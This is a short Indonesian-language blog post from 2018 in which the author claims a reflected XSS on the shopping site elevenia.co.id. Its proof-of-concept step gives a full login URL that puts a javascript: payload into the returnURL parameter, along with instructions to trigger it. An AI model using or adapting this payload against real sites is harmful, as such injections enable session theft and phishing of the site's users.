Saturday, August 11, 2018

Reflected XSS on elevenia.co.id


Reflected XSS on elevenia.co.id - Halo Guys, Balik lagi bersama saya :D. Pada artikel kali ini saya cuma mau share aja bahwa saya nemu xss di elevenia.co.id , yakni situs jual beli online di indonesia yang cukup banyak diketahui orang orang.

Jadi ceritanya w abis nonton film back to the future, nah terus ada iklan elevenia tuh. Karena w penasaran akhirnya w telusuri telusuri, dan nemu deh :''"V.


PoC


  1. Buka :
https://www.elevenia.co.id/login.do?isSSL=Y&returnURL=javascript:prompt(%27XSS BY ./z3rb0a%27);
  1. Kalau Belom Login Ya Login dulu Baru buka web itu.
  2. Bingo, alertnya muncul deh :D
Oke sekian Untuk Kali ini, Jangan lupa untuk di share keteman teman, dan jangan lupa juga Cl1ck 1kl4nnya ea :''V
Load disqus comments

1 comments: